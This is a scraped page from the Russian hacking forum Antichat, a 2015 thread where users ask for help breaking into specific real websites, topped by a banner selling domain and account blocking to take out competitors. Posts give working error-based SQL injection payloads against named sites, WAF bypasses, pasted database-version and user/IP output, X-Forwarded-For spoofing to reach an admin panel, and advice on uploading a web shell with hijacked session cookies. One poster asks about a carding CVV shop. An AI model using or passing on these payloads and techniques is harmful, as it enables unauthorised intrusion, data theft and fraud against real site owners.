УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 58 из 296

Опции темы

Поиск в этой теме

Опции просмотра

#571

19.09.2015, 22:01

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от DezMond™

DezMond™ said:
↑
А limit как перебрать?

Вот пожалуйста, перебирайте:

Цитата:

Сообщение от None

http://www.die-medienanstalten.de/i...sPersonSearch=a'or(ExtractValue(1,concat(0x3a
,
(select/*!12345*/table_name/*!12345*/from/*!12345*/information_schema.tables/*!12345*/limit/*!12345*/1,1)
)))='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=al l&sBoolOp=and

#572

19.09.2015, 22:15

Timmkoy

Guest

Сообщений: n/a

Провел на форуме:
2592

Репутация: 0

Есть одна долгая TimeBased sql injection, что с ней можно сделать?

Как слить базу?

#573

20.09.2015, 05:19

ButilkaSoka

Guest

Сообщений: n/a

Провел на форуме:
7285

Репутация: 0

Есть проблема с WAF

Код:

Code:
http://www.spbpost.ru/index.php?page_id=305+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

Пробовал обходить, но не всеми способами.

А тут вообще без понятие что делать, не сталкивался с таким

Код:

Code:
http://frostland.pro/shop/search

POST:
search=%cd%e0%e9%f2%e8&searchword=1'%00

хелп

#574

20.09.2015, 06:33

Га-Ноцри

Guest

Сообщений: n/a

Провел на форуме:
103014

Репутация: 76

По первому линку, как вариант, добиваться вывода не через конструкцию union select, а через XPATH

C пробелами:

Код:

Code:
http://www.spbpost.ru/index.php?page_id=305 and extractvalue rand(),concat(0x3a,version(),0x3a,user()))--

Аналог без пробелов:

Код:

Code:
http://www.spbpost.ru/index.php?page_id=305*updatexml(0,lpad(user(),22,0x3A),1)#

#575

20.09.2015, 12:31

Br@!ns

Guest

Сообщений: n/a

Провел на форуме:
179197

Репутация: 25

Цитата:

Сообщение от ButilkaSoka

ButilkaSoka said:
↑
Есть проблема с WAF

Код:

Code:
http://www.spbpost.ru/index.php?page_id=305+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

Пробовал обходить, но не всеми способами.
А тут вообще без понятие что делать, не сталкивался с таким

Код:

Code:
http://frostland.pro/shop/search

POST:
search=%cd%e0%e9%f2%e8&searchword=1'%00

хелп

во втором случае так же через Error-based вектор:

POST

searchword=asf'or(ExtractValue(1,concat(0x3a,(sele ct(version())))))='1%00&search=%CD%E0%E9%F2%E8'

XPATH syntax error: ':10.0.11-MariaDB'

XPATH syntax error: ':frostla_main@37.187.136.213'

PS в следующий раз, если скуля в месте где нужно быть авторизованым, выкладывайте тестовый акк

#576

21.09.2015, 19:24

ynk

Guest

Сообщений: n/a

Провел на форуме:
1016

Репутация: 0

index.php?p=cvv&CONTRY=&STATE=&City=&TYPE=&BASE=12 .08.2015+MIX&BIN=&sub=Apply+filter

что можно сделать?

#577

21.09.2015, 20:14

ButilkaSoka

Guest

Сообщений: n/a

Провел на форуме:
7285

Репутация: 0

хелп

Есть данные админки, не пускает, походу пускает через ip, но они тоже есть(ip), возможно ли их подставить, если да, то как?

#578

21.09.2015, 20:28

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от ButilkaSoka

ButilkaSoka said:
↑
хелп
Есть данные админки, не пускает, походу пускает через ip, но они тоже есть(ip), возможно ли их подставить, если да, то как?

Если идет обработка IP по заголовку X-Forwarded-For "$_SERVER['HTTP_X_FORWARDED_FOR'];" то можно сделать подмену IP в заголовках хидера

Полезно почитать для понимания:

http://php.net/manual/ru/reserved.variables.php#79359

http://phpfaq.ru/ip

#579

22.09.2015, 12:35

Unknowhacker

Guest

Сообщений: n/a

Провел на форуме:
94006

Репутация: 24

Столкнулся с проблемой загрузки шелла. Итак, перехватил данные куки - залогился , но когда нажимаю править новость в надежде загрузить шелл, то выскакивает окно Basic Authorization

Код:

Code:
http://timer-odessa.net

Log:

Код:

Code:
Array
(
[admin] => file
[do] => upload
[ID] =>
[MaterialName] => новая запись
[UrlAlias] =>
[ajax] => 1
[qqfile] => 2.jpg
[tinymcePasteText] => 1
[__cfduid] => d324f6c51adb790a7d0cce7ebea72e8291425213546
[__utma] => 31476155.825643414.1425214893.1442902126.1442908595.874
[__utmb] => 31476155.3.10.1442908595
[__utmc] => 31476155
[__utmz] => 31476155.1441743778.772.137.utmcsr=facebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/
[_ym_visorc_15944878] => w
[PHPSESSID] => 2defc90036f0f83fb04646af0e2ab3dc
)

P.S Уже в учётке менял пароль, все равно это окно выскакивает!

#580

22.09.2015, 12:41

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Видимо когда вы оброщаитесь к редактированию, подгружаются модули из папки которая защищена бейсик авторизацией, в перехваченных куках у вас нет куков под бейсик авторизацию.... возможно в вашей админки вам попадется локальный инклуд, где вы сможете найти файлик с паролем от бейсик авторизации...

Страница 58 из 296

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход